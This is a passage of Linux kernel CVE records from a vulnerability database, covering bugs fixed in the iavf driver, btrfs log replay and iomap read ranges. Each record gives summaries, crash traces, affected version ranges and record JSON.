"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5de7ad7e18356e39e8fbf7edd185a5faaf4f385a"
},
{
"url": "https://git.kernel.org/stable/c/33ff5c207c873215e54e6176624ed57423cb7dea"
},
{
"url": "https://git.kernel.org/stable/c/30386e090c49e803c0616a7147e43409c32a2b0e"
},
{
"url": "https://git.kernel.org/stable/c/5979338c83012110ccd45cae6517591770bfe536"
},
{
"url": "https://git.kernel.org/stable/c/ee4183501ea556dca31f5ffd8690aa9fd25b609f"
},
{
"url": "https://git.kernel.org/stable/c/e3fc381320d04e4a74311e576a86cac49a16fc43"
},
{
"url": "https://git.kernel.org/stable/c/ac782f4e3bfcde145b8a7f8af31d9422d94d172a"
}
],
"title": "ipv4: Fix reference count leak when using error routes with nexthop objects",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71097",
"datePublished": "2026-01-13T15:34:56.814Z",
"dateReserved": "2026-01-13T15:30:19.650Z",
"dateUpdated": "2026-01-19T12:19:58.253Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71087 (GCVE-0-2025-71087)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
iavf: fix off-by-one issues in iavf_config_rss_reg()
Summary
In the Linux kernel, the following vulnerability has been resolved:
iavf: fix off-by-one issues in iavf_config_rss_reg()
There are off-by-one bugs when configuring RSS hash key and lookup
table, causing out-of-bounds reads to memory [1] and out-of-bounds
writes to device registers.
Before commit 43a3d9ba34c9 ("i40evf: Allow PF driver to configure RSS"),
the loop upper bounds were:
i <= I40E_VFQF_{HKEY,HLUT}_MAX_INDEX
which is safe since the value is the last valid index.
That commit changed the bounds to:
i <= adapter->rss_{key,lut}_size / 4
where `rss_{key,lut}_size / 4` is the number of dwords, so the last
valid index is `(rss_{key,lut}_size / 4) - 1`. Therefore, using `<=`
accesses one element past the end.
Fix the issues by using `<` instead of `<=`, ensuring we do not exceed
the bounds.
[1] KASAN splat about rss_key_size off-by-one
BUG: KASAN: slab-out-of-bounds in iavf_config_rss+0x619/0x800
Read of size 4 at addr ffff888102c50134 by task kworker/u8:6/63
CPU: 0 UID: 0 PID: 63 Comm: kworker/u8:6 Not tainted 6.18.0-rc2-enjuk-tnguy-00378-g3005f5b77652-dirty #156 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
Workqueue: iavf iavf_watchdog_task
Call Trace:
<TASK>
dump_stack_lvl+0x6f/0xb0
print_report+0x170/0x4f3
kasan_report+0xe1/0x1a0
iavf_config_rss+0x619/0x800
iavf_watchdog_task+0x2be7/0x3230
process_one_work+0x7fd/0x1420
worker_thread+0x4d1/0xd40
kthread+0x344/0x660
ret_from_fork+0x249/0x320
ret_from_fork_asm+0x1a/0x30
</TASK>
Allocated by task 63:
kasan_save_stack+0x30/0x50
kasan_save_track+0x14/0x30
__kasan_kmalloc+0x7f/0x90
__kmalloc_noprof+0x246/0x6f0
iavf_watchdog_task+0x28fc/0x3230
process_one_work+0x7fd/0x1420
worker_thread+0x4d1/0xd40
kthread+0x344/0x660
ret_from_fork+0x249/0x320
ret_from_fork_asm+0x1a/0x30
The buggy address belongs to the object at ffff888102c50100
which belongs to the cache kmalloc-64 of size 64
The buggy address is located 0 bytes to the right of
allocated 52-byte region [ffff888102c50100, ffff888102c50134)
The buggy address belongs to the physical page:
page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x102c50
flags: 0x200000000000000(node=0|zone=2)
page_type: f5(slab)
raw: 0200000000000000 ffff8881000418c0 dead000000000122 0000000000000000
raw: 0000000000000000 0000000080200020 00000000f5000000 0000000000000000
page dumped because: kasan: bad access detected
Memory state around the buggy address:
ffff888102c50000: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc
ffff888102c50080: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc
>ffff888102c50100: 00 00 00 00 00 00 04 fc fc fc fc fc fc fc fc fc
^
ffff888102c50180: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc
ffff888102c50200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
43a3d9ba34c9ca313573201d3f45de5ab3494cec , < ceb8459df28d22c225a82d74c0f725f2a935d194
(git)
Affected: 43a3d9ba34c9ca313573201d3f45de5ab3494cec , < 5bb18bfd505ca1affbca921462c350095a6c798c (git) Affected: 43a3d9ba34c9ca313573201d3f45de5ab3494cec , < d7369dc8dd7cbf5cee3a22610028d847b6f02982 (git) Affected: 43a3d9ba34c9ca313573201d3f45de5ab3494cec , < 18de0e41d69d97fab10b91fecf10ae78a5e43232 (git) Affected: 43a3d9ba34c9ca313573201d3f45de5ab3494cec , < f36de3045d006e6d9be1be495f2ed88d1721e752 (git) Affected: 43a3d9ba34c9ca313573201d3f45de5ab3494cec , < 3095228e1320371e143835d0cebeef1a8a754c66 (git) Affected: 43a3d9ba34c9ca313573201d3f45de5ab3494cec , < 6daa2893f323981c7894c68440823326e93a7d61 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/iavf/iavf_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ceb8459df28d22c225a82d74c0f725f2a935d194",
"status": "affected",
"version": "43a3d9ba34c9ca313573201d3f45de5ab3494cec",
"versionType": "git"
},
{
"lessThan": "5bb18bfd505ca1affbca921462c350095a6c798c",
"status": "affected",
"version": "43a3d9ba34c9ca313573201d3f45de5ab3494cec",
"versionType": "git"
},
{
"lessThan": "d7369dc8dd7cbf5cee3a22610028d847b6f02982",
"status": "affected",
"version": "43a3d9ba34c9ca313573201d3f45de5ab3494cec",
"versionType": "git"
},
{
"lessThan": "18de0e41d69d97fab10b91fecf10ae78a5e43232",
"status": "affected",
"version": "43a3d9ba34c9ca313573201d3f45de5ab3494cec",
"versionType": "git"
},
{
"lessThan": "f36de3045d006e6d9be1be495f2ed88d1721e752",
"status": "affected",
"version": "43a3d9ba34c9ca313573201d3f45de5ab3494cec",
"versionType": "git"
},
{
"lessThan": "3095228e1320371e143835d0cebeef1a8a754c66",
"status": "affected",
"version": "43a3d9ba34c9ca313573201d3f45de5ab3494cec",
"versionType": "git"
},
{
"lessThan": "6daa2893f323981c7894c68440823326e93a7d61",
"status": "affected",
"version": "43a3d9ba34c9ca313573201d3f45de5ab3494cec",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/iavf/iavf_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "4.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: fix off-by-one issues in iavf_config_rss_reg()\n\nThere are off-by-one bugs when configuring RSS hash key and lookup\ntable, causing out-of-bounds reads to memory [1] and out-of-bounds\nwrites to device registers.\n\nBefore commit 43a3d9ba34c9 (\"i40evf: Allow PF driver to configure RSS\"),\nthe loop upper bounds were:\n i \u003c= I40E_VFQF_{HKEY,HLUT}_MAX_INDEX\nwhich is safe since the value is the last valid index.\n\nThat commit changed the bounds to:\n i \u003c= adapter-\u003erss_{key,lut}_size / 4\nwhere `rss_{key,lut}_size / 4` is the number of dwords, so the last\nvalid index is `(rss_{key,lut}_size / 4) - 1`. Therefore, using `\u003c=`\naccesses one element past the end.\n\nFix the issues by using `\u003c` instead of `\u003c=`, ensuring we do not exceed\nthe bounds.\n\n[1] KASAN splat about rss_key_size off-by-one\n BUG: KASAN: slab-out-of-bounds in iavf_config_rss+0x619/0x800\n Read of size 4 at addr ffff888102c50134 by task kworker/u8:6/63\n\n CPU: 0 UID: 0 PID: 63 Comm: kworker/u8:6 Not tainted 6.18.0-rc2-enjuk-tnguy-00378-g3005f5b77652-dirty #156 PREEMPT(voluntary)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n Workqueue: iavf iavf_watchdog_task\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xb0\n print_report+0x170/0x4f3\n kasan_report+0xe1/0x1a0\n iavf_config_rss+0x619/0x800\n iavf_watchdog_task+0x2be7/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\n Allocated by task 63:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7f/0x90\n __kmalloc_noprof+0x246/0x6f0\n iavf_watchdog_task+0x28fc/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n\n The buggy address belongs to the object at ffff888102c50100\n which belongs to the cache kmalloc-64 of size 64\n The buggy address is located 0 bytes to the right of\n allocated 52-byte region [ffff888102c50100, ffff888102c50134)\n\n The buggy address belongs to the physical page:\n page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x102c50\n flags: 0x200000000000000(node=0|zone=2)\n page_type: f5(slab)\n raw: 0200000000000000 ffff8881000418c0 dead000000000122 0000000000000000\n raw: 0000000000000000 0000000080200020 00000000f5000000 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff888102c50000: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n ffff888102c50080: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n \u003effff888102c50100: 00 00 00 00 00 00 04 fc fc fc fc fc fc fc fc fc\n ^\n ffff888102c50180: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc\n ffff888102c50200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:51.272Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ceb8459df28d22c225a82d74c0f725f2a935d194"
},
{
"url": "https://git.kernel.org/stable/c/5bb18bfd505ca1affbca921462c350095a6c798c"
},
{
"url": "https://git.kernel.org/stable/c/d7369dc8dd7cbf5cee3a22610028d847b6f02982"
},
{
"url": "https://git.kernel.org/stable/c/18de0e41d69d97fab10b91fecf10ae78a5e43232"
},
{
"url": "https://git.kernel.org/stable/c/f36de3045d006e6d9be1be495f2ed88d1721e752"
},
{
"url": "https://git.kernel.org/stable/c/3095228e1320371e143835d0cebeef1a8a754c66"
},
{
"url": "https://git.kernel.org/stable/c/6daa2893f323981c7894c68440823326e93a7d61"
}
],
"title": "iavf: fix off-by-one issues in iavf_config_rss_reg()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71087",
"datePublished": "2026-01-13T15:34:49.691Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-01-19T12:19:51.272Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68778 (GCVE-0-2025-68778)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-14 08:51
VLAI?
EPSS
Title
btrfs: don't log conflicting inode if it's a dir moved in the current transaction
Summary
In the Linux kernel, the following vulnerability has been resolved:
btrfs: don't log conflicting inode if it's a dir moved in the current transaction
We can't log a conflicting inode if it's a directory and it was moved
from one parent directory to another parent directory in the current
transaction, as this can result an attempt to have a directory with
two hard links during log replay, one for the old parent directory and
another for the new parent directory.
The following scenario triggers that issue:
1) We have directories "dir1" and "dir2" created in a past transaction.
Directory "dir1" has inode A as its parent directory;
2) We move "dir1" to some other directory;
3) We create a file with the name "dir1" in directory inode A;
4) We fsync the new file. This results in logging the inode of the new file
and the inode for the directory "dir1" that was previously moved in the
current transaction. So the log tree has the INODE_REF item for the
new location of "dir1";
5) We move the new file to some other directory. This results in updating
the log tree to included the new INODE_REF for the new location of the
file and removes the INODE_REF for the old location. This happens
during the rename when we call btrfs_log_new_name();
6) We fsync the file, and that persists the log tree changes done in the
previous step (btrfs_log_new_name() only updates the log tree in
memory);
7) We have a power failure;
8) Next time the fs is mounted, log replay happens and when processing
the inode for directory "dir1" we find a new INODE_REF and add that
link, but we don't remove the old link of the inode since we have
not logged the old parent directory of the directory inode "dir1".
As a result after log replay finishes when we trigger writeback of the
subvolume tree's extent buffers, the tree check will detect that we have
a directory a hard link count of 2 and we get a mount failure.
The errors and stack traces reported in dmesg/syslog are like this:
[ 3845.729764] BTRFS info (device dm-0): start tree-log replay
[ 3845.730304] page: refcount:3 mapcount:0 mapping:000000005c8a3027 index:0x1d00 pfn:0x11510c
[ 3845.731236] memcg:ffff9264c02f4e00
[ 3845.731751] aops:btree_aops [btrfs] ino:1
[ 3845.732300] flags: 0x17fffc00000400a(uptodate|private|writeback|node=0|zone=2|lastcpupid=0x1ffff)
[ 3845.733346] raw: 017fffc00000400a 0000000000000000 dead000000000122 ffff9264d978aea8
[ 3845.734265] raw: 0000000000001d00 ffff92650e6d4738 00000003ffffffff ffff9264c02f4e00
[ 3845.735305] page dumped because: eb page dump
[ 3845.735981] BTRFS critical (device dm-0): corrupt leaf: root=5 block=30408704 slot=6 ino=257, invalid nlink: has 2 expect no more than 1 for dir
[ 3845.737786] BTRFS info (device dm-0): leaf 30408704 gen 10 total ptrs 17 free space 14881 owner 5
[ 3845.737789] BTRFS info (device dm-0): refs 4 lock_owner 0 current 30701
[ 3845.737792] item 0 key (256 INODE_ITEM 0) itemoff 16123 itemsize 160
[ 3845.737794] inode generation 3 transid 9 size 16 nbytes 16384
[ 3845.737795] block group 0 mode 40755 links 1 uid 0 gid 0
[ 3845.737797] rdev 0 sequence 2 flags 0x0
[ 3845.737798] atime 1764259517.0
[ 3845.737800] ctime 1764259517.572889464
[ 3845.737801] mtime 1764259517.572889464
[ 3845.737802] otime 1764259517.0
[ 3845.737803] item 1 key (256 INODE_REF 256) itemoff 16111 itemsize 12
[ 3845.737805] index 0 name_len 2
[ 3845.737807] item 2 key (256 DIR_ITEM 2363071922) itemoff 16077 itemsize 34
[ 3845.737808] location key (257 1 0) type 2
[ 3845.737810] transid 9 data_len 0 name_len 4
[ 3845.737811] item 3 key (256 DIR_ITEM 2676584006) itemoff 16043 itemsize 34
[ 3845.737813] location key (258 1 0) type 2
[ 3845.737814] transid 9 data_len 0 name_len 4
[ 3845.737815] item 4 key (256 DIR_INDEX 2) itemoff 16009 itemsize 34
[ 3845.737816] location key (257 1 0) type 2
[
---truncated---
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
44f714dae50a2e795d3268a6831762aa6fa54f55 , < d64f3834dffef80f0a9185a037617a54ed7f4bd2
(git)
Affected: 44f714dae50a2e795d3268a6831762aa6fa54f55 , < 7359e1d39c78816ecbdb0cb4e93975794ce53973 (git) Affected: 44f714dae50a2e795d3268a6831762aa6fa54f55 , < d478f50727c3ee46d0359f0d2ae114f70191816e (git) Affected: 44f714dae50a2e795d3268a6831762aa6fa54f55 , < a35788ddf8df65837897ecbb0ddb2896b863159e (git) Affected: 44f714dae50a2e795d3268a6831762aa6fa54f55 , < 266273eaf4d99475f1ae57f687b3e42bc71ec6f0 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/btrfs/tree-log.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d64f3834dffef80f0a9185a037617a54ed7f4bd2",
"status": "affected",
"version": "44f714dae50a2e795d3268a6831762aa6fa54f55",
"versionType": "git"
},
{
"lessThan": "7359e1d39c78816ecbdb0cb4e93975794ce53973",
"status": "affected",
"version": "44f714dae50a2e795d3268a6831762aa6fa54f55",
"versionType": "git"
},
{
"lessThan": "d478f50727c3ee46d0359f0d2ae114f70191816e",
"status": "affected",
"version": "44f714dae50a2e795d3268a6831762aa6fa54f55",
"versionType": "git"
},
{
"lessThan": "a35788ddf8df65837897ecbb0ddb2896b863159e",
"status": "affected",
"version": "44f714dae50a2e795d3268a6831762aa6fa54f55",
"versionType": "git"
},
{
"lessThan": "266273eaf4d99475f1ae57f687b3e42bc71ec6f0",
"status": "affected",
"version": "44f714dae50a2e795d3268a6831762aa6fa54f55",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/btrfs/tree-log.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.8"
},
{
"lessThan": "4.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: don\u0027t log conflicting inode if it\u0027s a dir moved in the current transaction\n\nWe can\u0027t log a conflicting inode if it\u0027s a directory and it was moved\nfrom one parent directory to another parent directory in the current\ntransaction, as this can result an attempt to have a directory with\ntwo hard links during log replay, one for the old parent directory and\nanother for the new parent directory.\n\nThe following scenario triggers that issue:\n\n1) We have directories \"dir1\" and \"dir2\" created in a past transaction.\n Directory \"dir1\" has inode A as its parent directory;\n\n2) We move \"dir1\" to some other directory;\n\n3) We create a file with the name \"dir1\" in directory inode A;\n\n4) We fsync the new file. This results in logging the inode of the new file\n and the inode for the directory \"dir1\" that was previously moved in the\n current transaction. So the log tree has the INODE_REF item for the\n new location of \"dir1\";\n\n5) We move the new file to some other directory. This results in updating\n the log tree to included the new INODE_REF for the new location of the\n file and removes the INODE_REF for the old location. This happens\n during the rename when we call btrfs_log_new_name();\n\n6) We fsync the file, and that persists the log tree changes done in the\n previous step (btrfs_log_new_name() only updates the log tree in\n memory);\n\n7) We have a power failure;\n\n8) Next time the fs is mounted, log replay happens and when processing\n the inode for directory \"dir1\" we find a new INODE_REF and add that\n link, but we don\u0027t remove the old link of the inode since we have\n not logged the old parent directory of the directory inode \"dir1\".\n\nAs a result after log replay finishes when we trigger writeback of the\nsubvolume tree\u0027s extent buffers, the tree check will detect that we have\na directory a hard link count of 2 and we get a mount failure.\nThe errors and stack traces reported in dmesg/syslog are like this:\n\n [ 3845.729764] BTRFS info (device dm-0): start tree-log replay\n [ 3845.730304] page: refcount:3 mapcount:0 mapping:000000005c8a3027 index:0x1d00 pfn:0x11510c\n [ 3845.731236] memcg:ffff9264c02f4e00\n [ 3845.731751] aops:btree_aops [btrfs] ino:1\n [ 3845.732300] flags: 0x17fffc00000400a(uptodate|private|writeback|node=0|zone=2|lastcpupid=0x1ffff)\n [ 3845.733346] raw: 017fffc00000400a 0000000000000000 dead000000000122 ffff9264d978aea8\n [ 3845.734265] raw: 0000000000001d00 ffff92650e6d4738 00000003ffffffff ffff9264c02f4e00\n [ 3845.735305] page dumped because: eb page dump\n [ 3845.735981] BTRFS critical (device dm-0): corrupt leaf: root=5 block=30408704 slot=6 ino=257, invalid nlink: has 2 expect no more than 1 for dir\n [ 3845.737786] BTRFS info (device dm-0): leaf 30408704 gen 10 total ptrs 17 free space 14881 owner 5\n [ 3845.737789] BTRFS info (device dm-0): refs 4 lock_owner 0 current 30701\n [ 3845.737792] \titem 0 key (256 INODE_ITEM 0) itemoff 16123 itemsize 160\n [ 3845.737794] \t\tinode generation 3 transid 9 size 16 nbytes 16384\n [ 3845.737795] \t\tblock group 0 mode 40755 links 1 uid 0 gid 0\n [ 3845.737797] \t\trdev 0 sequence 2 flags 0x0\n [ 3845.737798] \t\tatime 1764259517.0\n [ 3845.737800] \t\tctime 1764259517.572889464\n [ 3845.737801] \t\tmtime 1764259517.572889464\n [ 3845.737802] \t\totime 1764259517.0\n [ 3845.737803] \titem 1 key (256 INODE_REF 256) itemoff 16111 itemsize 12\n [ 3845.737805] \t\tindex 0 name_len 2\n [ 3845.737807] \titem 2 key (256 DIR_ITEM 2363071922) itemoff 16077 itemsize 34\n [ 3845.737808] \t\tlocation key (257 1 0) type 2\n [ 3845.737810] \t\ttransid 9 data_len 0 name_len 4\n [ 3845.737811] \titem 3 key (256 DIR_ITEM 2676584006) itemoff 16043 itemsize 34\n [ 3845.737813] \t\tlocation key (258 1 0) type 2\n [ 3845.737814] \t\ttransid 9 data_len 0 name_len 4\n [ 3845.737815] \titem 4 key (256 DIR_INDEX 2) itemoff 16009 itemsize 34\n [ 3845.737816] \t\tlocation key (257 1 0) type 2\n [\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T08:51:28.881Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d64f3834dffef80f0a9185a037617a54ed7f4bd2"
},
{
"url": "https://git.kernel.org/stable/c/7359e1d39c78816ecbdb0cb4e93975794ce53973"
},
{
"url": "https://git.kernel.org/stable/c/d478f50727c3ee46d0359f0d2ae114f70191816e"
},
{
"url": "https://git.kernel.org/stable/c/a35788ddf8df65837897ecbb0ddb2896b863159e"
},
{
"url": "https://git.kernel.org/stable/c/266273eaf4d99475f1ae57f687b3e42bc71ec6f0"
}
],
"title": "btrfs: don\u0027t log conflicting inode if it\u0027s a dir moved in the current transaction",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68778",
"datePublished": "2026-01-13T15:28:54.107Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-14T08:51:28.881Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68794 (GCVE-0-2025-68794)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-14 08:51
VLAI?
EPSS
Title
iomap: adjust read range correctly for non-block-aligned positions
Summary
In the Linux kernel, the following vulnerability has been resolved:
iomap: adjust read range correctly for non-block-aligned positions
iomap_adjust_read_range() assumes that the position and length passed in
are block-aligned. This is not always the case however, as shown in the
syzbot generated case for erofs. This causes too many bytes to be
skipped for uptodate blocks, which results in returning the incorrect
position and length to read in. If all the blocks are uptodate, this
underflows length and returns a position beyond the folio.
Fix the calculation to also take into account the block offset when
calculating how many bytes can be skipped for uptodate blocks.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
9dc55f1389f9569acf9659e58dd836a9c70df217 , < 82b60ffbb532d919959702768dca04c3c0500ae5
(git)
Affected: 9dc55f1389f9569acf9659e58dd836a9c70df217 , < 12053695c8ef5410e8cc6c9ed4c0db9cd9c82b3e (git) Affected: 9dc55f1389f9569acf9659e58dd836a9c70df217 , < 142194fb21afe964d2d194cab1fc357cbf87e899 (git) Affected: 9dc55f1389f9569acf9659e58dd836a9c70df217 , < 7aa6bc3e8766990824f66ca76c19596ce10daf3e (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/iomap/buffered-io.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "82b60ffbb532d919959702768dca04c3c0500ae5",
"status": "affected",
"version": "9dc55f1389f9569acf9659e58dd836a9c70df217",
"versionType": "git"
},
{
"lessThan": "12053695c8ef5410e8cc6c9ed4c0db9cd9c82b3e",
"status": "affected",
"version": "9dc55f1389f9569acf9659e58dd836a9c70df217",
"versionType": "git"
},
{
"lessThan": "142194fb21afe964d2d194cab1fc357cbf87e899",
"status": "affected",
"version": "9dc55f1389f9569acf9659e58dd836a9c70df217",
"versionType": "git"
},
{
"lessThan": "7aa6bc3e8766990824f66ca76c19596ce10daf3e",
"status": "affected",
"version": "9dc55f1389f9569acf9659e58dd836a9c70df217",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/iomap/buffered-io.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
